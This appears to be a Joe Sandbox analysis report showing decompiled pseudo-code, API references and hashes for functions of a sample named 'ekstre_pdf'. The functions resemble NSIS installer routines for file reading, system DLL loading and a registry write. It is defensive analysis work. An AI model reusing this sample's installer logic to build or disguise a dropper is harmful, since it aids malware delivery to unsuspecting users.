Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll
API String ID: 1495540970-2612738845
Opcode ID: 00543d35a91b3056645e330f8c1c80af753cc64eb86b363f3303fb139c758560
Instruction ID: e617c90639b463154ff281a7d80f0307398216e3a4aab6ce2758e364a25c8bd2
Opcode Fuzzy Hash: 00543d35a91b3056645e330f8c1c80af753cc64eb86b363f3303fb139c758560
Instruction Fuzzy Hash: 71219071900518BACF11AFA5DE84DDFBF75EF45754F14803AF908B22A0C7794A409F68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t76 - 4));
				} else {
					__ecx = 0x1fff;
					if(__eax > 0x1fff) {
						 *(__ebp - 0x44) = 0x1fff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *((intOrPtr*)(_t76 - 4)) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, ?str?) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, "true"); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, ?str?) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, "true");
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027b6
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402793
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027CC

Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406124

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 960ac60adf11a5fc7ebc23baac66c1207dcd70f19740543607837fd60e971363
Instruction ID: 620448a8bab14e9452c48d91e63db2175682d00909be529100e700e2a3688af0
Opcode Fuzzy Hash: 960ac60adf11a5fc7ebc23baac66c1207dcd70f19740543607837fd60e971363
Instruction Fuzzy Hash: 67510A75D00219AADF20EFD5CA88AAEBB75FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

UXTHEME, xrefs: 004068A3
\, xrefs: 004068C2
%s%S.dll, xrefs: 004068E6

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6ED62209 Relevance: 9.1, APIs: 6, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E6ED62209(intOrPtr* _a4) {
				intOrPtr* _t23;
				signed int _t24;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6ED612F8();
				_t23 = _a4;
				_t33 =  *((intOrPtr*)(_t23 + 0x1014));
				_t42 = (_t33 + 0x81 << 5) + _t23;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t24 =  *(_t42 - 8) & 0x000000ff;
					if(_t24 <= 7) {
						switch( *((intOrPtr*)(_t24 * 4 +  &M6ED62331))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6ed64064 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6ed64084 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6ED6149E(__ecx);
								goto L16;
							case 3:
								__ecx =  *0x6ed65040;
								__ecx - 1 = MultiByteToWideChar(0, 0,  *__edx, __ecx, __edi, __ecx - 1);
								__eax =  *0x6ed65040;
								__ecx = 0;
								 *((short*)(__edi + __eax * 2 - 2)) = __cx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__edx,  *0x6ed65040);
								goto L17;
							case 5:
								_push( *0x6ed65040);
								_push(__edi);
								_push( *__edx);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6ed64058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14)); // executed
					}
					_t25 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E6ED61638(_t25 - 1, _t39);
								goto L26;
							}
						} else {
							E6ED615EB(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}

0x6ed62211
0x6ed62213
0x6ed62217
0x6ed62226
0x6ed62228
0x6ed6222d
0x6ed6222d
0x6ed62235
0x6ed6223c
0x6ed62242
0x00000000
0x6ed6224b
0x00000000
0x00000000
0x6ed62253
0x6ed62257
0x6ed62259
0x6ed6225a
0x6ed62265
0x6ed62269
0x6ed62269
0x6ed62270
0x00000000
0x00000000
0x6ed62273
0x6ed62274
0x6ed62277
0x6ed62279
0x00000000
0x00000000
0x6ed62280
0x6ed62292
0x6ed62298
0x6ed6229d
0x6ed6229f
0x00000000
0x00000000
0x6ed622c0
0x00000000
0x00000000
0x6ed622a6
0x6ed622ac
0x6ed622ad
0x6ed622af
0x00000000
0x00000000
0x6ed622c8
0x6ed622ca
0x6ed622d0
0x6ed622d6
0x6ed622d6
0x00000000
0x00000000
0x6ed62242
0x6ed622d9
0x6ed622dd
0x6ed622f1
0x6ed622f1
0x6ed622f7
0x6ed622fc
0x6ed62301
0x6ed6230d
0x6ed62312
0x00000000
0x6ed62317
0x6ed62303
0x6ed62304
0x6ed62318
0x6ed62318
0x6ed62301
0x6ed62319
0x6ed6231c
0x6ed6231c
0x6ed6232f

APIs

Part of subcall function 6ED612F8: GlobalAlloc.KERNEL32(00000040,?,6ED611C4,-000000A0), ref: 6ED61302

GlobalFree.KERNEL32(00000000), ref: 6ED622F1
GlobalFree.KERNEL32(00000000), ref: 6ED62326

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 873d266a489238d2c23d641dbe0fdd8babe9e605ecd3cf5cb9e08adcebd123d9
Instruction ID: 4b9109e57a04067e95bb61b297cb019d221fb223daf43c7cee3099ea136b857e
Opcode Fuzzy Hash: 873d266a489238d2c23d641dbe0fdd8babe9e605ecd3cf5cb9e08adcebd123d9
Instruction Fuzzy Hash: 3E31E031204501EFEF558FA9DA68A7AB7B8FB4B319F00492DF445C7160D721989ADB70

Uniqueness

Uniqueness Score: -1.00%

Function 6ED62049 Relevance: 7.6, APIs: 5, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E6ED62049(signed int _a4) {
				signed int _t44;
				void* _t45;
				signed int _t46;
				signed int _t50;
				void* _t54;
				signed int _t57;
				void* _t58;
				int _t59;

				_t50 = _a4;
				_t59 = 0;
				_t44 = 0 |  *((intOrPtr*)(_t50 + 0x1014)) > 0x00000000;
				while(1) {
					L1:
					_a4 = _t44;
					_t57 = _t44 << 5;
					_t58 =  *(_t57 + _t50 + 0x1030);
					if(_t58 == 0 || _t58 == 0x1a) {
						goto L8;
					}
					if(_t58 != 0xffffffff) {
						_t49 = _t58 - 1;
						if(_t58 - 1 > 0x18) {
							 *(_t57 + _t50 + 0x1030) = 0x1a;
							L11:
							_t54 = _t57 + _t50;
							if( *((intOrPtr*)(_t57 + _t50 + 0x101c)) >= _t59) {
							}
							_t46 =  *(_t57 + _t50 + 0x1018) & 0x000000ff;
							 *(_t57 + _t50 + 0x1034) =  *(_t57 + _t50 + 0x1034) & 0x00000000;
							if(_t46 > 7) {
								L26:
								_t59 = 0;
								goto L27;
							} else {
								switch( *((intOrPtr*)(_t46 * 4 +  &M6ED621E9))) {
									case 0:
										_t59 = 0;
										 *((intOrPtr*)(_t54 + 0x1020)) = 0;
										goto L27;
									case 1:
										_push(__esi);
										__eax = E6ED6135A();
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6ED6135A();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L26;
									case 3:
										__eax = GlobalAlloc(0x40,  *0x6ed65040);
										 *(__edi + __ebx + 0x1034) = __eax;
										 *__ebp = __eax;
										__ebp = 0;
										__ecx =  *0x6ed65040;
										__eax = WideCharToMultiByte(0, 0, __esi,  *0x6ed65040, __eax,  *0x6ed65040, 0, 0);
										goto L27;
									case 4:
										__eax = E6ED612E1(__esi);
										 *(__edi + __ebx + 0x1034) = __eax;
										L18:
										_pop(__ecx);
										 *__ebp = __eax;
										goto L26;
									case 5:
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__edi + __ebx + 0x1034) = __eax;
										_push(__esi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										goto L26;
									case 6:
										__ebp = 0;
										if( *__esi != __bp) {
											_push(__esi);
											__eax = E6ED6135A();
											 *(__edi + __ebx + 0x1020) = __eax;
										}
										L27:
										_t47 = GlobalFree(_t58); // executed
										_t55 = _a4;
										if(_t55 == 0) {
											return _t47;
										}
										_t53 =  !=  ? _t55 + 1 : 0;
										_t44 =  !=  ? _t55 + 1 : 0;
										goto L1;
									case 7:
										__ecx =  *(__edi + __ebx + 0x1030);
										__eax =  *0x6ed65038;
										 *(__edi + __ebx + 0x1030) - 1 = ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ed65040;
										__ecx =  *0x6ed65038 + ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ed65040 * 2;
										__eax = __ecx + 0x18;
										 *(__edx + 0x1020) = __eax;
										_push(__ecx);
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6ED6149E(__ecx);
										__esp = __esp + 0xc;
										goto L26;
								}
							}
						}
						_t45 = E6ED61548(_t49);
						L9:
						L10:
						_t58 = _t45;
						goto L11;
					}
					_t45 = E6ED61593();
					goto L10;
					L8:
					_t45 = E6ED612E1(0x6ed640e0);
					goto L9;
				}
			}

0x6ed6204a
0x6ed62051
0x6ed6205b
0x6ed6205e
0x6ed6205e
0x6ed62060
0x6ed62064
0x6ed62067
0x6ed62070
0x00000000
0x00000000
0x6ed6207a
0x6ed62083
0x6ed62089
0x6ed62093
0x6ed620ad
0x6ed620ad
0x6ed620b7
0x6ed620b7
0x6ed620c7
0x6ed620cf
0x6ed620da
0x6ed621bc
0x6ed621bc
0x00000000
0x6ed620e0
0x6ed620e0
0x00000000
0x6ed620e7
0x6ed620e9
0x00000000
0x00000000
0x6ed620f4
0x6ed620f5
0x00000000
0x00000000
0x6ed62103
0x6ed62104
0x6ed62109
0x6ed6210a
0x6ed6210d
0x00000000
0x00000000
0x6ed6212c
0x6ed62132
0x6ed62139
0x6ed6213c
0x6ed6213e
0x6ed6214c
0x00000000
0x00000000
0x6ed62116
0x6ed6211b
0x6ed620fa
0x6ed620fa
0x6ed620fb
0x00000000
0x00000000
0x6ed62158
0x6ed6215e
0x6ed6215f
0x6ed62166
0x6ed62167
0x6ed6216a
0x00000000
0x00000000
0x6ed62172
0x6ed62177
0x6ed62179
0x6ed6217a
0x6ed62187
0x6ed62187
0x6ed621be
0x6ed621bf
0x6ed621c5
0x6ed621cb
0x6ed621e6
0x6ed621e6
0x6ed621d8
0x6ed621db
0x00000000
0x00000000
0x6ed62190
0x6ed62197
0x6ed6219d
0x6ed621a4
0x6ed621a7
0x6ed621aa
0x6ed621b0
0x6ed621b1
0x6ed621b2
0x6ed621b3
0x6ed621b4
0x6ed621b9
0x00000000
0x00000000
0x6ed620e0
0x6ed620da
0x6ed6208c
0x6ed620aa
0x6ed620ab
0x6ed620ab
0x00000000
0x6ed620ab
0x6ed6207c
0x00000000
0x6ed620a0
0x6ed620a5
0x00000000
0x6ed620a5

APIs

GlobalFree.KERNEL32(00000000), ref: 6ED621BF

Part of subcall function 6ED612E1: lstrcpynW.KERNEL32(00000000,?,6ED6156A,?,6ED611C4,-000000A0), ref: 6ED612F1

GlobalAlloc.KERNEL32(00000040), ref: 6ED6212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6ED6214C

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 276a78c498ba8a8e03ed6f98aa43c4a5bad877304a56c97c50d9390e8242d4c4
Instruction ID: 0cb75352bb11e15c60110508caddf8faf9b29a5e4386994ad381d33079489383
Opcode Fuzzy Hash: 276a78c498ba8a8e03ed6f98aa43c4a5bad877304a56c97c50d9390e8242d4c4
Instruction Fuzzy Hash: 47414871409605EFDB509FA8C844AEA77B8FB06349F40463DED8C9B185DB74A581CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x4125f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x4125f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x4125f0, 0xc000);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x4125f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x47af88 =  *0x47af88 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x00402515
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslB24E.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslB24E.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslB24E.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

C:\Users\user\AppData\Local\Temp\nslB24E.tmp, xrefs: 004024C6, 004024D4, 004024EB, 004024FF, 0040250A

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nslB24E.tmp
